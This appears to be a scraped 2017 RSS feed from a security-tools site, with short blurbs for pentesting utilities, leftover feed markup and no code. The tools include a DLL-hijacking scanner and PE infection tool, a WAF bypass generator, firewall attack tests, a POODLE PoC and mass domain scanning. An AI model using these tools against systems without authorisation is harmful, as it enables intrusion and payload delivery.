Changelog WinDivert v1.3.0 24/9/2017:
– Fix BSOD that sometimes occurs after abnormal user application exit.
– Fix BSOD that sometimes occurs when WinDivert is combined with other callout drivers.
– WinDivertSend() has been optimized. However, it may not detect as many packet injection errors as it could before.

The tool is not meant for complete accuracy. There are very serious recommendations normally to not rely on the output of GNU core-utils such as ls for tool input. In other words; one should rarely build tools to parse and rely on this type of output as it can change all the time. Realistically the output of these tools is relatively stable as a lot of people and automatic tools already rely on their outputs for all kinds of purposes.

dawgmon

However the tradeoff for dawgmon is the following; we would need to implement a lot of logic to do file system monitoring ourselves, build complex binaries that include libraries to do the parsing and monitoring of block devices, the network interfaces and what not more. This will also make the tool way more
complex and less maintainable. On projects right now one can add a new command including change detection in very little time as the main dawgmon tool already takes care of caching, executing the command and then supplying the previous and current output when running a comparision to a command implementation. This means that on time-constrained projects one can very quickly add a new command
and run analysises including those new commands.

]]>Siofra – DLL Hijacking Vulnerability Scanner and PE Infection Tool.http://seclist.us/siofra-dll-hijacking-vulnerability-scanner-and-pe-infection-tool.html
Sat, 09 Sep 2017 06:45:52 +0000http://seclist.us/?p=15412Legal Disclaimer:Don’t Use at production machine or your daily computer/laptop, This post Security Research purpose only; You Can Learn how to identify and exploit DLL hijacking vulnerabilities within a single tools utility.

Introduction
Windows has historically had significant issues with DLL hijacking vulnerabilities, and over the years Microsoft has implemented security mechanisms in an attempt to mitigate such attacks. While analyzing an advanced persistent threat (APT) in early 2017, I was shown how surprisingly vulnerable Windows still is to such attacks, even after decades of patching specific vulnerabilities and implementing new security mechanisms. In this particular APT alone, there were three separate vulnerabilities in three different. applications all being leveraged for persistence.

The capabilities of Siofra tool can be divided into two categories (intended for the two stages of carrying out this genre of attack):1. Scanner mode, meant for identifying vulnerabilities in a desired target program (or set of programs) during the reconnaissance phase of an attack.2. Infection mode, meant for infecting legitimate copies of the vulnerable modules identified during the reconnaissance phase of an attack for payload delivery during the exploitation phase of an attack.

]]>domain_analyzer – security analysis of any domain by finding all the information possible.http://seclist.us/domain_analyzer-security-analysis-of-any-domain-by-finding-all-the-information-possible.html
Wed, 30 Aug 2017 08:48:27 +0000http://seclist.us/?p=15327Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.

How it work?
Domain analyzer takes a domain name and finds information about it, such as DNS servers, mail servers, IP addresses, mails on Ggole, SPF information, etc. After all the information is stored and organized it scans the ports of every IP found using nmap and perform several other security checks. After the ports are found, it uses the tool crawler.py from @vero.valeros, to spider the complete web page of all the web ports found. This tool has the option to download files and find open folders.

This extended edition has more features!
– World-domination: You can automatically analyze the whole world! (if you have time)
– Robin-hood: Although it is still in develpment, it will let you send automatically an email to the mails found during scan with the analysis information.
– Robex DNS: With this incredible function, every time you found a DNS servers with Zone Transfer, it will retrieve from the robtex site other domains using that DNS server! It will automatically analyze them too! This can be a never ending test! Every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved can be unrelated to the first one.

]]>penthefire – Security tool implementing attacks test the resistance of firewall.http://seclist.us/penthefire-security-tool-implementing-attacks-test-the-resistance-of-firewall.html
Sun, 20 Aug 2017 00:15:08 +0000http://seclist.us/?p=15225LEGAL DISCLAMERThe author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

penthefire – Security tool implementing attacks test the resistance of firewall.TODO:
+ IRC
Data packet is received, the attacker send a forged DCC command.
+ FTP
Client connection is open by the attacker. Connect to the ftp server behind a firewall and initiate a real connection. Once the session is setup, he launch the attack by sending a forged 227 command, if using IPv6 using 229 command.

]]>WAF_Bypass_Helper – WAF bypass generator helper.http://seclist.us/waf_bypass_helper-waf-bypass-generator-helper.html
Sun, 13 Aug 2017 20:34:09 +0000http://seclist.us/?p=15173LEGAL DISCLAMERThe author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

Note:
– Can work this get and post request
-+- Standart proxy: 127.0.0.1 8080 (test on burp)
– If you select output to a file, two files will be created. A file containing only the found mutations and a file containing the order of creating these mutations

]]>winspect – Powershell based Windows Security Auditing Toolbox.http://seclist.us/winspect-powershell-based-windows-security-auditing-toolbox.html
Wed, 09 Aug 2017 15:25:47 +0000http://seclist.us/?p=15139winspect is a part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that that need further hardening. The main targets for the script are domain-joined windows machines. However, some of the functions can also be invoked for standalone workstations.

winspect

Feature Function:
+ Gets domain users and groups with local group membership.
+ Given a specific ADSI group object, it checks whether it is a local or domain group and looks fro its members.
+ Checks current configuration of User Account Control.
+ Checks DLL Search mode and inspects permissions for directories in user and system %PATH% .
+ Gets services whose binaries are writable by current user.
+ Looks for services with unquoted path vulnerability.
+ Gets all services that the current user can configure.
+ Looks for autoruns specified in different places in the registry.

]]>RPL attacks framework for simulating WSN with a malicious mote.http://seclist.us/rpl-attacks-framework-for-simulating-wsn-with-a-malicious-mote.html
Sat, 05 Aug 2017 04:28:11 +0000http://seclist.us/?p=15110RPL Attacks Framework is aimed to provide a simple and convenient way to generate simulations and deploy malicious motes for a Wireless Sensor Network (WSN) that uses Routing Protocol for Low-power and lossy devices (RPL) as its network layer.
With this framework, it is possible to easily define campaign of simulations either redefining RPL configuration constants, modifying single lines from the ContikiRPL library or using an own external RPL library. Moreover, experiments in a campaign can be generated either based on a same or a randomized topology for each simulation.

]]>poodle-Poc ~ Poodle (Padding Oracle On Downgraded Legacy Encryption) attack.http://seclist.us/poodle-poc-poodle-padding-oracle-on-downgraded-legacy-encryption-attack.html
Mon, 31 Jul 2017 17:58:00 +0000http://seclist.us/?p=15069poodle-PoC is PoC explore the cryptography behind the attack, it can be assimilate to the MiTM. Poodle allow you to retrieve plaintext messages if the Transport Layer Security used is SSLv3 (I also made a point for TLS1.0). It does not allow you to retrieve the private key used to encrypt the message or the request HTTP.

SSLv3 and CBC cipher mode
SSLv3 is a protocol to encrypt/decrypt and secure your data. In our case, he uses the CBC cipher mode chainning . The plaintext is divided into block regarding the encryption alogithm (AES,DES, 3DES) and the length is a mulitple of 8 or 16. If the plaintext don’t fill the length, a padding is added at the end to complete the missing space.

PoC of the Poodle Attack against SSL/TLS

HMAC
SSLv3 also use HMAC to check the integrity and authenticate of the plaintext.
— keyed-hash message authentication code (HMAC) is a specific type of message authentication code (MAC) involving a cryptographic hash function (hence the ‘H’) in combination with a secret cryptographic key
With this an attacker can’t intercept and alter the cipher then send it back.

Latest change 31/7/2017:
+ Update old PoC with OP_NO_COMPRESSION ssl option
This option disable the compression of the data during the client<->server exchange otherwise all the exchange will be compressed with DEFLATE
the compression seems to mitigate the poodle attack (need to make more research on this) because it’s no more possible to get the length of a bloc

]]>scythian – Vulnerability Assessment and Penetration Testing Toolkit.http://seclist.us/scythian-vulnerability-assessment-and-penetration-testing-toolkit.html
Sat, 08 Jul 2017 20:23:17 +0000http://seclist.us/?p=14741scythian is a set of scripts included in this package will create a Kali type environment for the performing of Vulnerability Assessments and Penetration Testing. The goal of this project was to allow a portable set of tools to be easily installed onto Windows 10 Linux subsystem (Ubuntu/Debian).

scythian

Contents of Files
+ deps.sh – Contains the necessary software dependencies for the tools within the kit to function.
+ exploits.sh – Contains the scripts to download various exploit code from public sources
+ services.sh – Starts the various integrated services of the kit such as msfrpcd, OpenVAS, Dradis, etc
+ static.sh – Downloads static applications which are not svn capable
+ svn.sh – SVN repository scripts to checkout and update the various tools
+ wordlists.sh – Contains the scripts to download the various wordlists from public sources
+ update.sh – The script that makes it all happen

]]>Pentesting-Multitool ~ Different utility scripts for pentesting and hacking.http://seclist.us/pentesting-multitool-different-utility-scripts-for-pentesting-and-hacking.html
Mon, 03 Jul 2017 23:45:23 +0000http://seclist.us/?p=14618Pentesting-Multitool project arises from the need to gather some pentesting tools into one tool. It will be developed using Python3 adding some external libraries as DNSPython, pythonwhois or scapy.
The main functions of the script is to collect information about the DNS records, domain or other devices.

Before using pentesting-multitool.py please follow these steps:
1.- Install python3, the script has been developed using python3.5.2 but I think that python3.x should work correctly, if not, please report it.
2.- Install python module dnspython-1.15.0, you can check it from the official website or official GitHub repository If you can use the library with another version, please report it.
3.- Install python module pythonwhois-2.4.3, you can download it from the offical website. If you can use the library with another version, please report it.
4.- Install python module shodan, you can check it from the official GitHub repository.
5.- Install python module scapy for python3, you can download it from the official website.
6.- Install TCPReplay you can download it from the official website http://tcpreplay.appneta.com/.